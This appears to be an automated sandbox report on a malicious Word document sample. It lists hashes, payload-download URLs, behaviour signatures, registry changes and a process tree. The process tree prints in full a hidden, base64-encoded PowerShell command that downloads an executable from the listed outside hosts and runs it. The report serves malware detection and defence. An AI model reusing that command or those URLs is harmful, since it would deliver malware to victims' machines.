Analysis
-
max time kernel
118s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
17-09-2024 05:58
Static task
static1
Behavioral task
behavioral1
Sample
e62f2edfeff116d22cc4f93d5b0313df_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
e62f2edfeff116d22cc4f93d5b0313df_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
e62f2edfeff116d22cc4f93d5b0313df_JaffaCakes118.doc
-
Size
200KB
-
MD5
e62f2edfeff116d22cc4f93d5b0313df
-
SHA1
4df8c1cbdce38925cc640f8d9649ee9b6a210cd3
-
SHA256
8846893c9d7c2a8b9d97068084f8c171e9110cf34322e70110da781dad24cc75
-
SHA512
b4cccee2550788949d3d6b510f84eaa1044f3c851136bc77e9f89127cd833c4eb0c5574524589db2a81fc753aa9d19f834604c11411445dac5c414f11a89d7c8
-
SSDEEP
3072:Ph2y/GdyjktGDWLS0HZWD5w8K7Nk9LD7IBUWlwCDuRdj95ks2:Ph2k4ztGiL3HJk9LD7bswC6Rdj95k/
Malware Config
Extracted
http://moisesdavid.com/qoong/vy/
http://insurancebabu.com/wp-admin/iXElcu9f/
http://rishi99.com/framework.impossible/dhADGeie6/
https://www.alertpage.net/confirmation/2nX/
https://anttarc.org/chartaxd/DMBuiwf5u/
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 2352 2976 WISPTIS.EXE 29 Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process 3068 2976 WISPTIS.EXE 29 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2140 2840 Powershell.exe 33 -
Blocklisted process makes network request 5 IoCs
flow pid Process 6 2140 Powershell.exe 7 2140 Powershell.exe 8 2140 Powershell.exe 11 2140 Powershell.exe 13 2140 Powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2140 Powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk Powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080}\ = "Tabs" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{8C0854BB-6871-4B3F-B134-19DF19763DA6}\1.0\FLAGS\ = "4" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4B7E55FD-279D-46DF-8D45-3E5B23F733FA} WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4B7E55FD-279D-46DF-8D45-3E5B23F733FA}\2.0\ = "Microsoft Forms 2.0 Object Library" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\TypeLib\{4B7E55FD-279D-46DF-8D45-3E5B23F733FA}\2.0\0\win32 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D115-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{8C0854BB-6871-4B3F-B134-19DF19763DA6}\1.0\0\win32 WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{8C0854BB-6871-4B3F-B134-19DF19763DA6}\1.0\0\win32\ = "C:\\Users\\Admin\\Application Data\\Microsoft\\Forms\\INKEDLib.exd" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{1D864D73-9066-4241-8975-3A9B14CF8AB1}\1.0\HELPDIR WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLPassword" WINWORD.EXE Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{4B7E55FD-279D-46DF-8D45-3E5B23F733FA}\2.0\HELPDIR\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Word8.0" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\TypeLib\{4B7E55FD-279D-46DF-8D45-3E5B23F733FA}\2.0\FLAGS\ = "6" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29}\ = "ControlEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D111-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{04598FC4-866C-11CF-AB7C-00AA00C08FCF}\ = "ICommandButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{1D864D73-9066-4241-8975-3A9B14CF8AB1}\1.0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\TypeLib\{4B7E55FD-279D-46DF-8D45-3E5B23F733FA}\2.0\0 WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2976 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2140 Powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2140 Powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 2976 WINWORD.EXE 2976 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 4 IoCs
pid Process 2976 WINWORD.EXE 2976 WINWORD.EXE 2352 WISPTIS.EXE 3068 WISPTIS.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2976 wrote to memory of 2700 2976 WINWORD.EXE 30 PID 2976 wrote to memory of 2700 2976 WINWORD.EXE 30 PID 2976 wrote to memory of 2700 2976 WINWORD.EXE 30 PID 2976 wrote to memory of 2700 2976 WINWORD.EXE 30 PID 2976 wrote to memory of 2352 2976 WINWORD.EXE 31 PID 2976 wrote to memory of 2352 2976 WINWORD.EXE 31 PID 2976 wrote to memory of 2352 2976 WINWORD.EXE 31 PID 2976 wrote to memory of 2352 2976 WINWORD.EXE 31 PID 2976 wrote to memory of 3068 2976 WINWORD.EXE 32 PID 2976 wrote to memory of 3068 2976 WINWORD.EXE 32 PID 2976 wrote to memory of 3068 2976 WINWORD.EXE 32 PID 2976 wrote to memory of 3068 2976 WINWORD.EXE 32
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e62f2edfeff116d22cc4f93d5b0313df_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2700
-
-
C:\Windows\SYSTEM32\WISPTIS.EXE"C:\Windows\SYSTEM32\WISPTIS.EXE" /ManualLaunch;2⤵
- Process spawned unexpected child process
- Suspicious use of SetWindowsHookEx
PID:2352
-
-
C:\Windows\SYSTEM32\WISPTIS.EXE"C:\Windows\SYSTEM32\WISPTIS.EXE" /ManualLaunch;2⤵
- Process spawned unexpected child process
- Suspicious use of SetWindowsHookEx
PID:3068
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABCAHcAbABiAGoAagBtAGoAegB2AD0AJwBJAHQAbQBwAG0AcgBuAGgAbABsAHUAJwA7ACQAVgBpAGkAaQBnAHAAegBlAGUAcwB2ACAAPQAgACcAOAA3ADMAJwA7ACQATgBqAHMAdABiAGgAbAB1AG8APQAnAFUAcgBlAGEAZgB2AG4AdABzAHgAdwBuAG8AJwA7ACQASwBkAHEAZwBsAHcAYQBvAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABWAGkAaQBpAGcAcAB6AGUAZQBzAHYAKwAnAC4AZQB4AGUAJwA7ACQASAByAHkAcABjAHAAdQBiAD0AJwBRAGYAdQBpAGYAbwBlAGQAJwA7ACQATQBrAHgAdABqAGkAYQByAHIAPQAuACgAJwBuAGUAdwAtAG8AYgBqACcAKwAnAGUAYwAnACsAJwB0ACcAKQAgAE4AZQB0AC4AdwBlAEIAQwBsAGkAZQBOAHQAOwAkAFYAZwB4AHAAcgBhAG0AagBzAGIAPQAnAGgAdAB0AHAAOgAvAC8AbQBvAGkAcwBlAHMAZABhAHYAaQBkAC4AYwBvAG0ALwBxAG8AbwBuAGcALwB2AHkALwAqAGgAdAB0AHAAOgAvAC8AaQBuAHMAdQByAGEAbgBjAGUAYgBhAGIAdQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AaQBYAEUAbABjAHUAOQBmAC8AKgBoAHQAdABwADoALwAvAHIAaQBzAGgAaQA5ADkALgBjAG8AbQAvAGYAcgBhAG0AZQB3AG8AcgBrAC4AaQBtAHAAbwBzAHMAaQBiAGwAZQAvAGQAaABBAEQARwBlAGkAZQA2AC8AKgBoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBhAGwAZQByAHQAcABhAGcAZQAuAG4AZQB0AC8AYwBvAG4AZgBpAHIAbQBhAHQAaQBvAG4ALwAyAG4AWAAvACoAaAB0AHQAcABzADoALwAvAGEAbgB0AHQAYQByAGMALgBvAHIAZwAvAGMAaABhAHIAdABhAHgAZAAvAEQATQBCAHUAaQB3AGYANQB1AC8AJwAuACIAUwBQAGwAYABpAFQAIgAoACcAKgAnACkAOwAkAEEAaQBnAGYAcQBoAGQAcABrAHIAdwBlAD0AJwBaAHUAdwB6AGgAawBhAHEAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEMAdQB6AGgAZABmAHEAbwBjAGoAdwB4ACAAaQBuACAAJABWAGcAeABwAHIAYQBtAGoAcwBiACkAewB0AHIAeQB7ACQATQBrAHgAdABqAGkAYQByAHIALgAiAEQAYABPAHcATgBgAGwATwBBAEQAZgBpAEwARQAiACgAJABDAHUAegBoAGQAZgBxAG8AYwBqAHcAeAAsACAAJABLAGQAcQBnAGwAdwBhAG8AKQA7ACQATwBwAHMAawBtAGoAcgBqAHkAYQBhAHoAbAA9ACcAVQBsAGUAcQBmAGcAbQBlAHQAagBrAHIAZgAnADsASQBmACAAKAAoACYAKAAnAEcAZQB0AC0ASQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAEsAZABxAGcAbAB3AGEAbwApAC4AIgBsAGAARQBgAE4AZwB0AGgAIgAgAC0AZwBlACAAMwA2ADkANwA3ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAFMAVABBAGAAUgBUACIAKAAkAEsAZABxAGcAbAB3AGEAbwApADsAJABLAGEAaQByAGEAcABzAGMAYgB6AG0APQAnAFoAegBqAGUAYQBtAHoAdwAnADsAYgByAGUAYQBrADsAJABSAGIAbAB5AGIAYwByAGwAPQAnAEoAcQB6AGMAYQB5AGYAcwBjAHAAZgB0ACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAFUAagBiAG4AZgBqAGYAdQA9ACcAUQBxAHAAcQByAGEAagBuAHoAawBzAGoAYQAnAA==1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2140
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
444B
MD5d527049e2137b97a0c31fd8b377f396b
SHA15a2a4c3bed305e5006b96634aef0c778b0064b44
SHA2568d5a953a90890ce4e94b76ee9e44c60659287e27941a742b0cc3757517800639
SHA512d25b92bc9d0f70ce4e6ff64a0182fbcce24c9abbd6dee7c71d43cbffc53b406d4fae57c7fe3dbabf6ef9d8a236be81e4cada75015611bd75f1c516308b3b177a
-
Filesize
19KB
MD50587fa88a52b5e36a773f89ea5422c38
SHA1a598a31ed8a978206a209141a54c61353408be3a
SHA256cc67286a241c3779b12e9a0414ac2dd95961c86846247abf7d471d18f01a8afd
SHA5126f4a56607028ec082c2ef956063ea3805b54f899285b7e832f9ef581dbedbe435e8188081bb38fd832c66e011c5936b2059f37ea32e69fdee7d0388d9961c35d